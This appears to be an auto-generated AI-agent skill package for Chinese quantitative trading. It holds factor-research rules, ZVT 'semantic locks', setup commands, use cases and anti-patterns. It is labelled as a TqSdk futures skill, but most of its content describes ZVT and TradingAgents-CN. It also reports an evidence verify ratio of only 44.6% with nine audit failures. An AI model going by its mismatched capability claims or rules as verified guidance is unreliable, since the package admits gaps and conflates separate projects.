- **`SHARED-FR-IC-005`** <sub>(medium)</sub>: 因子衰减期（Half-life）是因子信号强度的核心参数，直接决定最优再平衡频率。 半衰期 < 5 日：日频或周频换仓；5-20 日：周频或双周；> 20 日：月频换仓。 错误地对短期因子使用月频换仓，会导致大量 alpha 在持仓期内消散。
- **`SHARED-FR-NEUT-001`** <sub>(high)</sub>: 行业中性化（Industry Neutralization）：因子值若不对行业均值中性化， 因子收益中会混入行业轮动收益，难以判断是因子本身还是行业暴露驱动了收益。 行业中性化操作：factor_neutral = factor - industry_mean(factor)。
- **`SHARED-FR-NEUT-002`** <sub>(high)</sub>: 市值中性化（Market Cap Neutralization）：小盘股效应（小盘跑赢大盘） 是金融史上最持久的 anomaly 之一，会污染几乎所有未中性化的因子。 若因子与市值高度相关，选股会系统性偏向小盘，收益来自市值暴露而非因子本身。 需同时进行行业和市值中性化（Fama-MacBeth 回归或残差法）。
- **`SHARED-FR-NEUT-003`** <sub>(high)</sub>: 异常值处理（Winsorize/MAD）：因子原始值通常含有极端值，极端值会扭曲 分组分析（如 Q1/Q10 十分位）。应对原始因子值做 Winsorize（截尾至 [1%, 99%] 或 3-sigma）或 MAD（中位数绝对偏差）缩尾，然后再排名/中性化。
- **`SHARED-FR-NEUT-004`** <sub>(medium)</sub>: 因子正交化（Factor Orthogonalization）：当多个因子共同用于合成打分时， 高相关因子的合成等效于对单一因子过度权重，稀释信号多样性。 应在合成前对因子做施密特正交化或 PCA，消除因子间的多重共线性。
- **`SHARED-FR-NEUT-005`** <sub>(medium)</sub>: 缺失数据填充策略：因子计算中的 NaN（停牌/新股/数据缺口）若用截面均值填充 会引入 lookahead bias（均值本身含未来信息）；若完全删除会产生幸存者偏差； 正确做法是用截面中位数（当日所有股票的中位数，不依赖未来）或将该股当日排除。
- **`SHARED-FR-PORT-001`** <sub>(high)</sub>: 分层分析（Quantile Analysis）：因子评估应使用 Q1/Q5（五分位）或 Q1/Q10（十分位）分组的多空收益差（top minus bottom spread）作为 主要评估指标，而非简单的多头收益。Q1 多 Q5 空的"单调性"检验是 因子有效性的核心证据：单调递增/递减 > 非单调 >> 仅多头有效。
- **`SHARED-FR-PORT-002`** <sub>(medium)</sub>: Alpha 衰减测试（Alpha Decay Test）：因子的月度 IC 在不同时段（牛市/熊市/ 震荡市）的稳定性是因子鲁棒性的重要证据。IC 仅在某个特定市场状态下有效 的因子不适合全天候部署；应分段（rolling 12M）展示 IC 时序， 识别因子失效期。
- **`SHARED-FR-PORT-003`** <sub>(medium)</sub>: 换仓成本感知（Turnover-Aware Selection）：因子排名靠近中间地带（49-51 分位） 的股票，排名小幅波动就会触发换仓，产生大量无效交易成本。 应在选股时设置换仓缓冲区（buffer zone）：只在排名变化超过阈值时才换仓。
- **`SHARED-FR-PORT-004`** <sub>(medium)</sub>: 分组收益的统计显著性（Bootstrap 检验）：因子分层收益差（Q1-Q5 spread） 即使在历史数据上很大，也可能是偶然，需要 bootstrap 或 t-test 检验 显著性（p-value < 0.05）。小样本回测期（< 3年）的分层收益尤其不可靠。
- **`SHARED-FR-XFER-001`** <sub>(high)</sub>: 因子跨市场可移植性验证：在一个市场有效的因子，不必然在另一个市场有效。 将美股因子直接套用 A 股、或将股票因子套用期货/加密货币，需要独立 IC 验证， 不可假设跨市场通用性。A 股特有异象（如反转效应、ST 价格异常）不存在于美股。
- **`SHARED-FR-XFER-002`** <sub>(medium)</sub>: 因子有效性时间稳定性：曾经有效的因子会因市场学习和套利行为逐渐失效 （McLean & Pontiff 2016 证明因子发表后平均衰减 58%）。 应定期（每季度/年）重新评估因子 IC，失效因子应及时替换或降权。
- **`SHARED-FR-XFER-003`** <sub>(medium)</sub>: 因子与宏观经济环境的交互：利率周期/经济周期/市场情绪对因子有效性影响显著。 价值因子（低 P/B）在利率上升期更有效；动量因子在趋势市更有效，震荡市失效。 部署因子前应评估当前宏观环境与因子最优生存环境的匹配度。

FILE:references/LOCKS.md
# Semantic Locks + Preconditions

## Semantic Locks (12)

### `SL-01` <sub>(on_violation: fatal)</sub>
Execute sell orders before buy orders in every trading cycle

### `SL-02` <sub>(on_violation: fatal)</sub>
Trading signals MUST use next-bar execution (no look-ahead)

### `SL-03` <sub>(on_violation: fatal)</sub>
Entity IDs MUST follow format entity_type_exchange_code

### `SL-04` <sub>(on_violation: fatal)</sub>
DataFrame index MUST be MultiIndex (entity_id, timestamp)

### `SL-05` <sub>(on_violation: fatal)</sub>
TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount

### `SL-06` <sub>(on_violation: fatal)</sub>
filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION

### `SL-07` <sub>(on_violation: fatal)</sub>
Transformer MUST run BEFORE Accumulator in factor pipeline

### `SL-08` <sub>(on_violation: fatal)</sub>
MACD parameters locked: fast=12, slow=26, signal=9

### `SL-09` <sub>(on_violation: warning)</sub>
Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001

### `SL-10` <sub>(on_violation: fatal)</sub>
A-share equity trading is T+1 (no same-day close of buy positions)

### `SL-11` <sub>(on_violation: fatal)</sub>
Recorder subclass MUST define provider AND data_schema class attributes

### `SL-12` <sub>(on_violation: fatal)</sub>
Factor result_df MUST contain either 'filter_result' OR 'score_result' column

## Preconditions (4)

- **`PC-01`**: `python3 -c 'import zvt; print(zvt.__version__)'` → on_fail: Run: python3 -m pip install zvt then re-run: python3 -m zvt.init_dirs to initialize data directories
- **`PC-02`**: `python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1); assert df is not None and len(df) > 0, 'No kdata found'"` → on_fail: Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000 (replace with your target entity IDs)
- **`PC-03`**: `python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); assert zvt_home.exists(), f'ZVT home not found: {zvt_home}'"` → on_fail: Run: python3 -m zvt.init_dirs
- **`PC-04`**: `python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"` → on_fail: Check directory permissions: chmod u+w ~/.zvt or set ZVT_HOME environment variable to a writable location

FILE:references/USE_CASES.md
# Known Use Cases (KUC)

Total: **29**

## `KUC-101`
**Source**: `docs/LLM_ADAPTER_TEMPLATE.py`

Users need a template to create custom LLM adapters for OpenAI-compatible API providers to integrate with TradingAgents framework.

## `KUC-102`
**Source**: `examples/batch_analysis.py`

Investors need to analyze multiple stocks simultaneously and generate comparison reports for portfolio selection and sector analysis.

## `KUC-103`
**Source**: `examples/cli_demo.py`

Chinese-speaking users need to see how TradingAgents CLI tools support Chinese language output and commands.

## `KUC-104`
**Source**: `examples/config_management_demo.py`

Users need to manage multiple LLM model configurations, track token usage, and monitor API costs across different providers.

## `KUC-105`
**Source**: `examples/crawlers/internal_message_crawler.py`

System needs to crawl internal messages from corporate sources and store them in the message database for analysis.

## `KUC-106`
**Source**: `examples/crawlers/message_crawler_scheduler.py`

System needs to coordinate and schedule crawling tasks for both social media and internal messages in a unified pipeline.

## `KUC-107`
**Source**: `examples/crawlers/social_media_crawler.py`

System needs to crawl social media platforms for stock-related discussions and sentiment data.

## `KUC-108`
**Source**: `examples/custom_analysis_demo.py`

Investors need customized stock analysis with selectable focus areas like technical, fundamental, risk assessment, or sector comparison.

## `KUC-109`
**Source**: `examples/dashscope_examples/demo_dashscope.py`

Users need to run TradingAgents framework using Alibaba's BaiLian (通义千问) large language model for stock analysis.

## `KUC-110`
**Source**: `examples/dashscope_examples/demo_dashscope_chinese.py`

Chinese-speaking users need stock analysis powered by BaiLian with complete Chinese language output and localized analysis.

## `KUC-111`
**Source**: `examples/dashscope_examples/demo_dashscope_no_memory.py`

Users need stateless stock analysis using BaiLian model without conversation history memory for independent analysis sessions.

## `KUC-112`
**Source**: `examples/dashscope_examples/demo_dashscope_simple.py`

Users need a simple test to verify BaiLian API connectivity and basic LLM functionality before running full analysis.

## `KUC-113`
**Source**: `examples/data_dir_config_demo.py`

Users need to configure and manage data storage directories for TradingAgents including cache, logs, and output paths.

## `KUC-114`
**Source**: `examples/demo_deepseek_analysis.py`

Users need to perform stock investment analysis using DeepSeek V3 large language model as an alternative to other providers.

## `KUC-115`
**Source**: `examples/demo_deepseek_simple.py`

Users need a minimal, dependency-light demonstration of DeepSeek API integration without complex TradingAgents imports.

## `KUC-116`
**Source**: `examples/demo_news_filtering.py`

Investors need to filter and clean news data to remove irrelevant or low-quality content before sentiment analysis.

## `KUC-117`
**Source**: `examples/enhanced_history_demo.py`

Users need to view, load, and review historical stock analysis results for tracking investment decisions over time.

## `KUC-118`
**Source**: `examples/my_stock_analysis.py`

Individual investors need a personalized script to analyze stocks of their choice with custom focus areas.

## `KUC-119`
**Source**: `examples/run_message_crawlers.py`

Users need to execute message crawling tasks for social media and internal communications through a unified runner script.

## `KUC-120`
**Source**: `examples/simple_analysis_demo.py`

New users need a quick, simple demonstration of TradingAgents-CN capabilities for rapid stock analysis.

## `KUC-121`
**Source**: `examples/stock_data_model_usage.py`

Users need to access extended stock data models with comprehensive company information for Chinese A-share markets.

## `KUC-122`
**Source**: `examples/stock_list_example.py`

Users need to fetch comprehensive stock lists with server failover capability from configuration files for robust data access.

## `KUC-123`
**Source**: `examples/stock_query_examples.py`

Users need to query stock data through a robust API that falls back to traditional methods when primary services fail.

## `KUC-124`
**Source**: `examples/test_enhanced_data_integration.py`

Users need to test the MongoDB app cache integration for faster data access when TA_USE_APP_CACHE is enabled.

## `KUC-125`
**Source**: `examples/test_installation.py`

Users need to verify that TradingAgents-CN is correctly installed with each dependencies and proper environment configuration.

## `KUC-126`
**Source**: `examples/test_news_timeout.py`

Users need to test news retrieval timeout handling, especially for Google News which may timeout, with polling retry mechanism.

## `KUC-127`
**Source**: `examples/token_tracking_demo.py`

Users need to track LLM token consumption, calculate API costs, and monitor usage statistics across different models.

## `KUC-128`
**Source**: `examples/tushare_demo.py`

Users need to access Chinese A-share market data (stocks, indices, fundamentals) through Tushare professional data API.

## `KUC-129`
**Source**: `examples/tushare_unified_demo.py`

Users need to use the unified TushareProvider and TushareSyncService for consistent access to Chinese market data with async support.

FILE:references/WISDOM.md
# Cross-Project Wisdom

Total: **10**

## `CW-BT-001` — Cerebro 统一编排引擎
**From**: backtrader · **Applicable to**: backtesting

backtrader 用 Cerebro 作为单一入口，统一管理 data feeds、strategies、analyzers、 observers 的生命周期，支持一次 cerebro.run() 跑多策略+多数据源。 zvt 的 StockTrader 目前每次实例化只绑定一套因子，缺乏统一的多策略组合编排层； 借鉴 Cerebro 模式可让用户把多个 Trader 实例组合到一个 runner 中对比评估。

## `CW-BT-002` — Analyzer 插件化绩效评估
**From**: backtrader · **Applicable to**: backtesting

backtrader 提供 SharpeRatio、DrawDown、TimeReturn、TradeAnalyzer 等即插即用 的 Analyzer，可在不修改策略代码的情况下附加任意绩效指标。 zvt 当前绩效评估能力较弱，没有标准化的 Analyzer 接口； 借鉴此模式可让用户 cerebro.addanalyzer(SharpeRatio) 即得风险调整收益报告。

## `CW-BT-003` — Sizer 仓位管理分离
**From**: backtrader · **Applicable to**: backtesting

backtrader 将仓位管理（每次开仓买多少股/多大比例）单独抽象为 Sizer， 与信号逻辑完全解耦；内置 FixedSize、PercentSizer 等，用户可自定义。 zvt 目前没有显式的 Sizer 概念，仓位控制逻辑散落在 Trader.on_profit_control 等钩子中； 引入 Sizer 接口可使策略信号与资金管理规则独立演化和组合复用。

## `CW-BT-004` — Order 类型全集（Limit/Stop/OCO/Bracket）
**From**: backtrader · **Applicable to**: backtesting

backtrader 支持 Market、Limit、Stop、StopLimit、OCO（二选一）、 Bracket（止盈止损一对订单）等丰富订单类型，并模拟成交滑点和手续费方案。 zvt 回测目前主要支持市价成交，缺乏限价委托和组合订单模拟； 对于高频或实盘对接场景，完善订单类型将大幅提升回测真实性。

## `CW-BT-005` — 数据重采样与重播（Resampling & Replaying）
**From**: backtrader · **Applicable to**: backtesting

backtrader 可将低级别数据（如 1 min）实时 resample 为高级别（如 1 day）并同步驱动策略， 或 replay 逐 tick 模拟 OHLC 形成过程，实现日内精细回测。 zvt 目前多时间框架通过预录入不同级别 K 线实现，缺少运行时动态重采样； 借鉴此模式可在不重复录入数据的前提下支持任意时间粒度组合回测。

## `CW-VN-003` — CTA 回测引擎内置可视化
**From**: vnpy · **Applicable to**: backtesting

vnpy 的 cta_backtester 提供图形界面直接展示策略净值曲线、最大回撤、 每日盈亏、成交明细，无需 Jupyter Notebook。 zvt 目前回测结果可视化依赖 draw_result 方法调用 Plotly，但无统一的回测报告页面； 借鉴此模式可打包一个开箱即用的策略绩效仪表盘。

## `CW-VN-004` — vnpy.alpha ML 因子研究实验室（Lab）
**From**: vnpy · **Applicable to**: factor-research

vnpy 4.0 的 vnpy.alpha.lab 提供数据管理、模型训练、信号生成、策略回测一体化工作流， 支持 Lasso/LightGBM/MLP 等算法的标准化训练接口和可视化对比。 zvt 的 ML 能力目前仅有 MaStockMLMachine 一个入口，缺乏规范化 Lab 框架； 借鉴 Lab 模式可建立"特征工程→训练→信号→回测"的标准流水线，降低 ML 实验门槛。

## `CW-QL-001` — Point-in-Time 数据库（防未来数据泄漏）
**From**: qlib · **Applicable to**: backtesting

qlib 的 Point-in-Time Provider 保证在给定时间点 t 的查询只返回 t 时刻 真实可知的数据（财报发布延迟、修订历史均被正确处理）， 彻底消除回测中的 look-ahead bias。 zvt 目前财务数据以报告期为 timestamp，缺少"发布日"维度， 存在用未来财报数据做选股的潜在偏差；引入 PIT 模式可大幅提升回测可信度。

## `CW-QL-002` — Recorder + Experiment 实验管理（MLflow 风格）
**From**: qlib · **Applicable to**: factor-research

qlib 的 workflow 模块提供 Experiment/Recorder，自动记录每次模型训练的 超参数、特征、指标、预测结果，支持跨实验比较和模型版本管理。 zvt 目前缺乏 ML 实验追踪机制，每次重跑结果会覆盖前次； 借鉴 Recorder 模式可将每次因子实验的参数和结果持久化，支持快速复现和版本对比。

## `CW-QL-003` — Nested Decision Framework（多层嵌套决策执行）
**From**: qlib · **Applicable to**: backtesting

qlib 支持将高频执行层（分钟级委托拆单）嵌套在低频决策层（日级组合调仓）中， 两层独立优化且可组合运行，实现日内最优执行算法（如 TWAP、VWAP 调仓）。 zvt 目前回测仅有日线级别的成交假设，缺乏执行算法建模； 借鉴嵌套框架可让 zvt 区分"何时持有哪些股"与"如何以最小冲击成本建仓"两个问题。

FILE:references/components/data_collection.md
# data_collection (4 classes)

## `DataSourceManager.get_fundamentals_data`
`data_collection/datasourcemanager-get-fundamentals-data.py:0`

## `DataSourceManager.get_data_source_manager`
`data_collection/datasourcemanager-get-data-source-manage.py:0`

## `TushareProvider._get_token_from_database`
`data_collection/tushareprovider-get-token-from-database.py:0`

## `data_source_provider`
`data_collection/data-source-provider.py:0`

FILE:references/components/investment_debate.md
# investment_debate (5 classes)

## `BullResearcher.research`
`investment_debate/bullresearcher-research.py:0`

## `BearResearcher.research`
`investment_debate/bearresearcher-research.py:0`

## `ResearchManager.judge`
`investment_debate/researchmanager-judge.py:0`

## `FinancialSituationMemory.get_memories`
`investment_debate/financialsituationmemory-get-memories.py:0`

## `debate_memory`
`investment_debate/debate-memory.py:0`

FILE:references/components/llm_provider_abstraction.md
# llm_provider_abstraction (5 classes)

## `create_llm_by_provider`
`llm_provider_abstraction/create-llm-by-provider.py:0`

## `OpenAICompatibleBase._generate`
`llm_provider_abstraction/openaicompatiblebase-generate.py:0`

## `ChatDeepSeekOpenAI.invoke`
`llm_provider_abstraction/chatdeepseekopenai-invoke.py:0`

## `ChatDashScopeOpenAIUnified.invoke`
`llm_provider_abstraction/chatdashscopeopenaiunified-invoke.py:0`

## `llm_provider`
`llm_provider_abstraction/llm-provider.py:0`

FILE:references/components/multi-analyst_pipeline.md
# multi-analyst_pipeline (6 classes)

## `MarketAnalyst.analyze`
`multi-analyst_pipeline/marketanalyst-analyze.py:0`

## `FundamentalsAnalyst.analyze`
`multi-analyst_pipeline/fundamentalsanalyst-analyze.py:0`

## `NewsAnalyst.analyze`
`multi-analyst_pipeline/newsanalyst-analyze.py:0`

## `SocialMediaAnalyst.analyze`
`multi-analyst_pipeline/socialmediaanalyst-analyze.py:0`

## `ConditionalLogic.should_continue_market`
`multi-analyst_pipeline/conditionallogic-should-continue-market.py:0`

## `analyst_type`
`multi-analyst_pipeline/analyst-type.py:0`

FILE:references/components/reflection_-_memory.md
# reflection_&_memory (4 classes)

## `Reflector.reflect_bull_researcher`
`reflection_&_memory/reflector-reflect-bull-researcher.py:0`

## `FinancialSituationMemory.add_memory`
`reflection_&_memory/financialsituationmemory-add-memory.py:0`

## `FinancialSituationMemory.get_memories`
`reflection_&_memory/financialsituationmemory-get-memories.py:0`

## `memory_backend`
`reflection_&_memory/memory-backend.py:0`

FILE:references/components/risk_debate.md
# risk_debate (5 classes)

## `RiskyDebator.debate`
`risk_debate/riskydebator-debate.py:0`

## `SafeDebator.debate`
`risk_debate/safedebator-debate.py:0`

## `NeutralDebator.debate`
`risk_debate/neutraldebator-debate.py:0`

## `RiskManager.judge`
`risk_debate/riskmanager-judge.py:0`

## `risk_debater`
`risk_debate/risk-debater.py:0`

FILE:references/components/signal_processing.md
# signal_processing (4 classes)

## `SignalProcessor.process`
`signal_processing/signalprocessor-process.py:0`

## `SignalProcessor._get_default_decision`
`signal_processing/signalprocessor-get-default-decision.py:0`

## `SignalProcessor.get_market_info`
`signal_processing/signalprocessor-get-market-info.py:0`

## `signal_llm`
`signal_processing/signal-llm.py:0`

FILE:references/components/trading_decision.md
# trading_decision (2 classes)

## `Trader.execute`
`trading_decision/trader-execute.py:0`

## `trader_llm`
`trading_decision/trader-llm.py:0`

FILE:references/components/web_api_service.md
# web_api_service (6 classes)

## `AnalysisService.submit_single_analysis`
`web_api_service/analysisservice-submit-single-analysis.py:0`

## `QueueService.enqueue`
`web_api_service/queueservice-enqueue.py:0`

## `RedisProgressTracker.track`
`web_api_service/redisprogresstracker-track.py:0`

## `SimpleAnalysisService.analyze`
`web_api_service/simpleanalysisservice-analyze.py:0`

## `task_queue`
`web_api_service/task-queue.py:0`

## `progress_pubsub`
`web_api_service/progress-pubsub.py:0`

ClawHub Data Analysis Research+2

T@clawhub-tangweigang-jpg-8679fec286

Tqsdk Futures Api

Skill

TqSdk 是中国期货市场的实时行情获取与策略回测框架，支持期权定价模型构建和波动率因子分析，可用于网格交易、目标仓位管理等量化场景。。

---
name: tqsdk-futures-api
description: |-
  TqSdk 是中国期货市场的实时行情获取与策略回测框架，支持期权定价模型构建和波动率因子分析，可用于网格交易、目标仓位管理等量化场景。。
license: Proprietary. See LICENSE.txt in project root.
compatibility: Designed for Doramagic-host ecosystem (Claude Code / openclaw / Cursor). Requires Python 3.12+ with uv package manager.
metadata:
  version: "v6.1"
  blueprint_id: "finance-bp-069"
  compiled_at: "2026-04-22T13:00:23.700958+00:00"
  capability_markets: "cn-astock"
  capability_activities: "backtesting, factor-research"
  sop_version: "crystal-compilation-v6.1"
---
# TqSdk 期货接口 (tqsdk-futures-api)

> TqSdk 是中国期货市场的实时行情获取与策略回测框架，支持期权定价模型构建和波动率因子分析，可用于网格交易、目标仓位管理等量化场景。

## Pipeline

`data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization`

## Top Use Cases (2 total)

### Basic Quote Retrieval Demo (`UC-101`)
Demonstrates basic TqSdk library usage by connecting to a simulated trading account and retrieving real-time quote data for a futures contract
**Triggers**: demo, quote, price

### Time-Dependent Volatility BS Pricing Model (`UC-102`)
Analyzes time-dependent volatility patterns in CSI 300 index to extend the standard Black-Scholes option pricing model for improved accuracy
**Triggers**: volatility, BS pricing, option

**Execute trigger**: `When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)`

## What I'll Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

## Semantic Locks (Fatal)

| ID | Rule | On Violation |
|---|---|---|
| `SL-01` | Execute sell orders before buy orders in every trading cycle | halt |
| `SL-02` | Trading signals MUST use next-bar execution (no look-ahead) | halt |
| `SL-03` | Entity IDs MUST follow format entity_type_exchange_code | halt |
| `SL-04` | DataFrame index MUST be MultiIndex (entity_id, timestamp) | halt |
| `SL-05` | TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount | halt |
| `SL-06` | filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION | halt |
| `SL-07` | Transformer MUST run BEFORE Accumulator in factor pipeline | halt |
| `SL-08` | MACD parameters locked: fast=12, slow=26, signal=9 | halt |

Full lock definitions: [references/LOCKS.md](references/LOCKS.md)

## Top Anti-Patterns (25 total)

- **`AP-ZVT-183`**: 除权因子为 inf/NaN 时直接参与乘法导致复权静默失败
- **`AP-ZVT-179`**: 第三方数据接口超限后异常被吞噬，数据静默缺失
- **`AP-ZVT-183B`**: HFQ（后复权）与 QFQ（前复权）K 线表使用错误导致因子计算漂移

All 25 anti-patterns: [references/ANTI_PATTERNS.md](references/ANTI_PATTERNS.md)

## Evidence Quality Notice

> [QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-069. Evidence verify ratio = 44.6% and audit fail total = 9. Generated results may have uncaptured requirement gaps. Verify critical decisions against source files (LATEST.yaml / LATEST.jsonl).

## Reference Files

| File | Contents | When to Load |
|---|---|---|
| [references/seed.yaml](references/seed.yaml) | V6+ 全量权威 (source-of-truth) | 有行为/决策争议时必读 |
| [references/ANTI_PATTERNS.md](references/ANTI_PATTERNS.md) | 25 条跨项目反模式 | 开始实现前 |
| [references/WISDOM.md](references/WISDOM.md) | 跨项目精华借鉴 | 架构决策时 |
| [references/CONSTRAINTS.md](references/CONSTRAINTS.md) | domain + fatal 约束 | 规则冲突时 |
| [references/USE_CASES.md](references/USE_CASES.md) | 全量 KUC-* 业务场景 | 需要完整示例时 |
| [references/LOCKS.md](references/LOCKS.md) | SL-* + preconditions + hints | 生成回测/交易代码前 |
| [references/COMPONENTS.md](references/COMPONENTS.md) | AST 组件地图（按 module 拆分）| 查 API 时 |

---

*Compiled by Doramagic crystal-compilation-v6.1 from `finance-bp-069` blueprint at 2026-04-22T13:00:23.700958+00:00.*
*See [human_summary.md](human_summary.md) for non-technical overview.*

FILE:human_summary.md
# Human Summary

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## What I Can Do

- **tagline**: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)
- **use_cases**: ['Time-Dependent Volatility BS Pricing Model', 'Basic Quote Retrieval Demo', 'A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney', 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader', 'Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout', 'Index composition data collection (SZ1000, SZ2000) with EM recorder', 'Institutional fund holdings tracker via joinquant_fund_runner pattern']

## What I Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

FILE:references/ANTI_PATTERNS.md
# Anti-Patterns (Cross-Project)

Total: **25**

## qlib (9)

### `AP-QLIB-1930` — 回测结果与模型无关——共享 dataset 对象导致预测值被首次模型覆盖 <sub>(high)</sub>

Qlib 中多个模型复用同一个已 fit 的 DatasetH 实例时，dataset 内部的标准化 参数（fit_start_time/fit_end_time 决定的归一化统计量）在第一次 fit 后固化。 切换模型但不重新初始化 dataset，导致所有模型实际使用同一套预测信号。表现为 无论换 LightGBM/XGBoost/DNN，回测净值曲线完全一致。这是最危险的"实验看起来 在跑，但结论全部无效"反模式。

Source: https://github.com/microsoft/qlib/issues/1930

### `AP-QLIB-2090` — fit_start_time 与 train segment 双重配置引发隐式数据泄露 <sub>(high)</sub>

Qlib DatasetH 有两个"训练数据范围"：handler 的 fit_start_time/fit_end_time （决定归一化器拟合范围）和 segments.train（决定模型训练范围）。常见错误是 让 fit_end_time 覆盖 valid/test 段，使归一化统计量（均值、标准差）包含了 未来数据，造成前向偏差（look-ahead bias）。两者独立配置但语义耦合，文档 未明确说明 fit_end_time 必须 <= train_end。

Source: https://github.com/microsoft/qlib/issues/2090

### `AP-QLIB-2036` — MACD 因子公式文档错误——DEA 被多除一次 CLOSE 导致量纲不一致 <sub>(high)</sub>

Qlib 官方文档中的 Alpha 公式示例将 MACD 的 DEA 定义为 EMA(DIF, 9) / CLOSE， 但 DIF 已经是无量纲（除过 CLOSE 的），再次除以 CLOSE 导致 DEA 量纲为 1/price。 基于此文档公式构建的 MACD 因子在截面标准化后与正确公式差异显著，IC 下降。 此类文档层面的公式错误会被大量用户直接照搬入生产因子库。

Source: https://github.com/microsoft/qlib/issues/2036

### `AP-QLIB-2184` — 自定义 A 股数据导入前未按约定填充停牌日 NaN，引发下游因子噪声 <sub>(high)</sub>

Qlib 约定停牌日 open/close/high/low/volume/factor 字段均应填 NaN，以便框架 在因子计算时识别并跳过。用户自建 A 股数据集时若将停牌日保留为上一日价格 （常见于从东财/Wind 直接导出的数据），会导致停牌期间的价格动量因子出现 "假信号"（价格不变但因子非零）。Qlib 不校验此约定，错误静默流入训练数据。

Source: https://github.com/microsoft/qlib/issues/2184

### `AP-QLIB-1892` — PIT（Point-In-Time）财务数据收集器依赖外部股票列表接口，全量 A 股获取不完整 <sub>(high)</sub>

Qlib 的 PIT 数据收集器（财务数据时间点快照）在初始化时调用 get_hs_stock_symbols() 获取沪深股票列表。该函数依赖东财 API，经常仅返回 部分列表而非全量 5000+ 股票，且函数在获取不完整时直接 raise ValueError。 用户若按文档步骤操作，财务数据集将只覆盖部分股票，基于 PIT 财务因子的回测 存在严重生存者偏差（未被采集的股票被隐式排除）。

Source: https://github.com/microsoft/qlib/issues/1892

### `AP-QLIB-2097` — 全市场 instrument="all" 在 32GB 内存机器上 OOM，但 CSI300 正常 <sub>(medium)</sub>

Qlib 在加载 Alpha158 特征时会将指定 universe 的全部特征矩阵一次性载入内存。 使用 instrument="csi300"（300 股）与 instrument="all"（5000+ 股）的内存占用 差约 16 倍。32GB 机器跑全市场时在 init_instance_by_config 阶段直接 OOM， 错误信息不提示内存问题。用户容易误以为是配置错误，实际上需要分批加载或 使用流式特征计算。

Source: https://github.com/microsoft/qlib/issues/2097

### `AP-QLIB-1984` — LightGBM 模型标签维度校验逻辑永远不触发导致多标签训练静默失败 <sub>(medium)</sub>

Qlib gbdt.py 中用 y.values.ndim == 2 判断是否为多标签，但从 DataFrame 取出的 Series 的 ndim 永远为 1，条件永远为 False，因此多标签训练不会走 squeeze 分支，而是直接进入 LightGBM 训练并在更深处抛出语义不明的错误。 用户尝试自定义多标签任务时无法从错误信息定位到此根因。

Source: https://github.com/microsoft/qlib/issues/1984

### `AP-QLIB-1915` — 自定义 CSV 数据 dump_bin 后 DataHandler 报 Length mismatch，D.features 却正常 <sub>(high)</sub>

Qlib 存在两套数据访问路径：D.features（直接读 binary）和 DataHandler/DataHandlerLP （带 processor pipeline）。自定义 A 股 CSV 数据在 dump_bin 时若字段顺序 或 symbol 格式（如 600000.SH vs SH600000）与 Qlib 约定不符，DataHandler 的 processor 在 align/reindex 时触发 Length mismatch，而 D.features 因不 经过 processor 而成功。这一"两套路径行为不一致"让用户误以为数据已正确导入。

Source: https://github.com/microsoft/qlib/issues/1915

### `AP-QLIB-1949` — Colab/Linux 多进程后端与 Qlib ParallelExt 冲突导致 DataHandler 完全不可用 <sub>(medium)</sub>

Qlib 在非 fork 环境（Windows 或 Google Colab）中，DataHandler 使用 joblib 并行加载特征时，ParallelExt 初始化时访问 _backend_args 属性失败（AttributeError）。 根因是 joblib 1.5+ 移除了该内部属性，Qlib 的兼容层未更新。表现为 D.features 调用抛出多层嵌套异常，用户无法从错误栈判断是并行后端问题还是数据问题。

Source: https://github.com/microsoft/qlib/issues/1949

## vnpy (4)

### `AP-VNPY-3691` — K 线生成器首根 K 线时间戳不对齐，导致第一个周期信号错误 <sub>(high)</sub>

vnpy BarGenerator 在合成 N 分钟 K 线时，第一根推送的 K 线时间戳为"当前 tick 所在分钟"而非"完整 N 分钟周期结束时间"。具体表现：09:59 的 tick 会 触发一根不完整的 5 分钟 K 线推送（本应等到 10:04 才推送）。策略若在 on_bar 中直接用 datetime.minute % 5 过滤，第一根 K 线恰好通过，但包含的 数据不足一个完整周期，用于信号计算会产生错误的开仓信号。

Source: https://github.com/vnpy/vnpy/issues/3691

### `AP-VNPY-3669` — Alpha 模块历史数据增量保存时新旧 DataFrame schema 不兼容导致 SchemaError <sub>(medium)</sub>

